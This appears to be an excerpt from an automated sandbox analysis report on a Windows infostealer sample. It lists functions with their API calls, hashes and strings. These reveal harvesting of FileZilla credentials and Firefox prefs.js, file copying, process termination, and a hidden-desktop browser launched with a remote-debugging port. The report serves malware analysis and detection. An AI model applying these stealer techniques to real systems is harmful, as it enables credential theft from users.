                                    • Instruction ID: 3261df052a3a2da4da70dfea266ebaea63e37b63f359e0e723d305bbc1a25ace
                                    • Opcode Fuzzy Hash: 57970d5b1fcdafa98da3c6e35d09a6eeba2ecece79241adc95f482d324318bf2
                                    • Instruction Fuzzy Hash: E3529171D116199BDB21EFB4DC49BAEB7B9AF44314F184028F825E7241DB78EC41EBA0
                                    Function 00F76B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76B9D
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76BCD
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76BFD
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76C2F
                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00F76C3C
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F76C43
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00F76C5A
                                    • lstrlen.KERNEL32(00000000), ref: 00F76C65
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76CA8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76CCF
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 00F76CE2
                                    • lstrlen.KERNEL32(00000000), ref: 00F76CED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76D30
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76D57
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00F76D6A
                                    • lstrlen.KERNEL32(00000000), ref: 00F76D75
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76DB8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76DDF
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00F76DF2
                                    • lstrlen.KERNEL32(00000000), ref: 00F76E01
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76E49
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76E71
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00F76E94
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00F76EA8
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00F76EC9
                                    • LocalFree.KERNEL32(00000000), ref: 00F76ED4
                                    • lstrlen.KERNEL32(?), ref: 00F76F6E
                                    • lstrlen.KERNEL32(?), ref: 00F76F81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 2641759534-2314656281
                                    • Opcode ID: 709c49fffd904998da55318ce9040576ca709e21b70795f8407536749d0ff150
                                    • Instruction ID: 02cfbeffb255a8846b8ebde4406c3beefb71e6ff019f6a68e9e6be4714c4c903
                                    • Opcode Fuzzy Hash: 709c49fffd904998da55318ce9040576ca709e21b70795f8407536749d0ff150
                                    • Instruction Fuzzy Hash: E4020670E11609AFDB21EBB0CC49E9E7B79AF44714F088429F925E7241DB78DC41E7A2
                                    Function 00F74B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F74B51
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74B74
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F74B7F
                                    • lstrlen.KERNEL32(00F94CA8), ref: 00F74B8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74BA7
                                    • lstrcat.KERNEL32(00000000,00F94CA8), ref: 00F74BB3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74BDE
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F74BFA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 2567437900-3783873740
                                    • Opcode ID: 8ef9c3b1f88871693ad5c6474b93e263c8466ebdc7aeae787131742bf56f9a27
                                    • Instruction ID: c302dcdb95aa912c12d68b9aa655d2b8c61a0545f76a1633066f37145175b342
                                    • Opcode Fuzzy Hash: 8ef9c3b1f88871693ad5c6474b93e263c8466ebdc7aeae787131742bf56f9a27
                                    • Instruction Fuzzy Hash: F1926E70E016058FDB28CF29C948B69B7E5BF44728F19C0AEE81D9B291D775EC82DB41
                                    Function 00F71250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F71291
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F712B4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F712BF
                                    • lstrlen.KERNEL32(00F94CA8), ref: 00F712CA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F712E7
                                    • lstrcat.KERNEL32(00000000,00F94CA8), ref: 00F712F3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7131E
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F7133A
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F7135C
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F71376
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F713AF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F713D7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F713E2
                                    • lstrlen.KERNEL32(00F91794), ref: 00F713ED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7140A
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71416
                                    • lstrlen.KERNEL32(?), ref: 00F71423
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71443
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F71451
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7147A
                                    • StrCmpCA.SHLWAPI(?,00A9CF50), ref: 00F714A3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F714E4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7150D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71535
                                    • StrCmpCA.SHLWAPI(?,00A9DD70), ref: 00F71552
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F71593
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F715BC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F715E4
                                    • StrCmpCA.SHLWAPI(?,00A9CF38), ref: 00F71602
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71633
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7165C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F71685
                                    • StrCmpCA.SHLWAPI(?,00A9CF68), ref: 00F716B3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F716F4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7171D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71745
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F71796
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F717BE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F717F5
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F7181C
                                    • FindClose.KERNEL32(00000000), ref: 00F7182B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 1346933759-0
                                    • Opcode ID: 1fd3c44eb7d65a1afda8078c71d54134ea1e1370cab6a5bf7dddd438fd73f253
                                    • Instruction ID: 4688c654774906d862d32bd759621ca5e4b21b3462869ddc63692c07e8a3979c
                                    • Opcode Fuzzy Hash: 1fd3c44eb7d65a1afda8078c71d54134ea1e1370cab6a5bf7dddd438fd73f253
                                    • Instruction Fuzzy Hash: 5712847191160A8BDB24EF78DC89AAE77B8BF44314F04853DF85AD7240DB34DC45AB91
                                    Function 00F7CBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00F7CBFC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00F7CC13
                                    • lstrcat.KERNEL32(?,?), ref: 00F7CC5F
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F7CC71
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F7CC8B
                                    • wsprintfA.USER32 ref: 00F7CCB0
                                    • PathMatchSpecA.SHLWAPI(?,00A991D8), ref: 00F7CCE2
                                    • CoInitialize.OLE32(00000000), ref: 00F7CCEE
                                      • Part of subcall function 00F7CAE0: CoCreateInstance.COMBASE(00F8B110,00000000,00000001,00F8B100,?), ref: 00F7CB06
                                      • Part of subcall function 00F7CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00F7CB46
                                      • Part of subcall function 00F7CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 00F7CBC9
                                    • CoUninitialize.COMBASE ref: 00F7CD09
                                    • lstrcat.KERNEL32(?,?), ref: 00F7CD2E
                                    • lstrlen.KERNEL32(?), ref: 00F7CD3B
                                    • StrCmpCA.SHLWAPI(?,00F8CFEC), ref: 00F7CD55
                                    • wsprintfA.USER32 ref: 00F7CD7D
                                    • wsprintfA.USER32 ref: 00F7CD9C
                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 00F7CDB0
                                    • wsprintfA.USER32 ref: 00F7CDD8
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00F7CDF1
                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00F7CE10
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00F7CE28
                                    • CloseHandle.KERNEL32(00000000), ref: 00F7CE33
                                    • CloseHandle.KERNEL32(00000000), ref: 00F7CE3F
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F7CE54
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7CE94
                                    • FindNextFileA.KERNEL32(?,?), ref: 00F7CF8D
                                    • FindClose.KERNEL32(?), ref: 00F7CF9F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                    • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 3860919712-2388001722
                                    • Opcode ID: 1898967f1269cfddea06ff641b4dcc4dbd47abfa08063d11fbd35e4d1b0a3a9d
                                    • Instruction ID: 4e785f6a9713aa3a43fb74b3d614dd8bf172014b81f85bae21403cdffd4e5adc
                                    • Opcode Fuzzy Hash: 1898967f1269cfddea06ff641b4dcc4dbd47abfa08063d11fbd35e4d1b0a3a9d
                                    • Instruction Fuzzy Hash: 6EC192719002099FDB64DF64DC49EEE77B9BF48300F0485A9F92997184EB34AE84DFA1
                                    Function 00F71269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F71291
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F712B4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F712BF
                                    • lstrlen.KERNEL32(00F94CA8), ref: 00F712CA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F712E7
                                    • lstrcat.KERNEL32(00000000,00F94CA8), ref: 00F712F3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7131E
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F7133A
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F7135C
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F71376
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F713AF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F713D7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F713E2
                                    • lstrlen.KERNEL32(00F91794), ref: 00F713ED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7140A
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F71416
                                    • lstrlen.KERNEL32(?), ref: 00F71423
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71443
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F71451
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7147A
                                    • StrCmpCA.SHLWAPI(?,00A9CF50), ref: 00F714A3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F714E4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7150D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71535
                                    • StrCmpCA.SHLWAPI(?,00A9DD70), ref: 00F71552
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F71593
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F715BC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F715E4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F71796
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F717BE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F717F5
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F7181C
                                    • FindClose.KERNEL32(00000000), ref: 00F7182B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 1346933759-0
                                    • Opcode ID: 860d80fed9a4d93b7628426753ae17b9322033359b507b39eb8d31047ca31759
                                    • Instruction ID: 8534496a7a9e254ded5c64881d04ba2f4e12e230dd9d3361cfebb032124f634c
                                    • Opcode Fuzzy Hash: 860d80fed9a4d93b7628426753ae17b9322033359b507b39eb8d31047ca31759
                                    • Instruction Fuzzy Hash: E5C1C37191160A8BDB65EF78DC89AAE77B8BF44314F044039F859D3241DB38DC49EB92
                                    Function 00F69770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 00F69790
                                    • lstrcat.KERNEL32(?,?), ref: 00F697A0
                                    • lstrcat.KERNEL32(?,?), ref: 00F697B1
                                    • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00F697C3
                                    • memset.MSVCRT ref: 00F697D7
                                      • Part of subcall function 00F83E70: lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F83EA5
                                      • Part of subcall function 00F83E70: lstrcpy.KERNEL32(00000000,00A9A7D0), ref: 00F83ECF
                                      • Part of subcall function 00F83E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00F6134E,?,0000001A), ref: 00F83ED9
                                    • wsprintfA.USER32 ref: 00F69806
                                    • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00F69827
                                    • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00F69844
                                      • Part of subcall function 00F846A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00F846B9
                                      • Part of subcall function 00F846A0: Process32First.KERNEL32(00000000,00000128), ref: 00F846C9
                                      • Part of subcall function 00F846A0: Process32Next.KERNEL32(00000000,00000128), ref: 00F846DB
                                      • Part of subcall function 00F846A0: StrCmpCA.SHLWAPI(?,?), ref: 00F846ED
                                      • Part of subcall function 00F846A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F84702
                                      • Part of subcall function 00F846A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00F84711
                                      • Part of subcall function 00F846A0: CloseHandle.KERNEL32(00000000), ref: 00F84718
                                      • Part of subcall function 00F846A0: Process32Next.KERNEL32(00000000,00000128), ref: 00F84726
                                      • Part of subcall function 00F846A0: CloseHandle.KERNEL32(00000000), ref: 00F84731
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F69878
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F69889
                                    • lstrcat.KERNEL32(00000000,00F94B60), ref: 00F6989B
                                    • memset.MSVCRT ref: 00F698AF
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F698D4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F69903
                                    • StrStrA.SHLWAPI(00000000,00A9E160), ref: 00F69919
                                    • lstrcpyn.KERNEL32(011993D0,00000000,00000000), ref: 00F69938
                                    • lstrlen.KERNEL32(?), ref: 00F6994B
                                    • wsprintfA.USER32 ref: 00F6995B
                                    • lstrcpy.KERNEL32(?,00000000), ref: 00F69971
                                    • Sleep.KERNEL32(00001388), ref: 00F699E7
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61557
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61579
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F6159B
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F615FF
                                      • Part of subcall function 00F692B0: strlen.MSVCRT ref: 00F692E1
                                      • Part of subcall function 00F692B0: strlen.MSVCRT ref: 00F692FA
                                      • Part of subcall function 00F692B0: strlen.MSVCRT ref: 00F69399
                                      • Part of subcall function 00F692B0: strlen.MSVCRT ref: 00F693E6
                                      • Part of subcall function 00F84740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00F84759
                                      • Part of subcall function 00F84740: Process32First.KERNEL32(00000000,00000128), ref: 00F84769
                                      • Part of subcall function 00F84740: Process32Next.KERNEL32(00000000,00000128), ref: 00F8477B
                                      • Part of subcall function 00F84740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F8479C
                                      • Part of subcall function 00F84740: TerminateProcess.KERNEL32(00000000,00000000), ref: 00F847AB
                                      • Part of subcall function 00F84740: CloseHandle.KERNEL32(00000000), ref: 00F847B2
                                      • Part of subcall function 00F84740: Process32Next.KERNEL32(00000000,00000128), ref: 00F847C0
                                      • Part of subcall function 00F84740: CloseHandle.KERNEL32(00000000), ref: 00F847CB
                                    • CloseDesktop.USER32(?), ref: 00F69A1C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
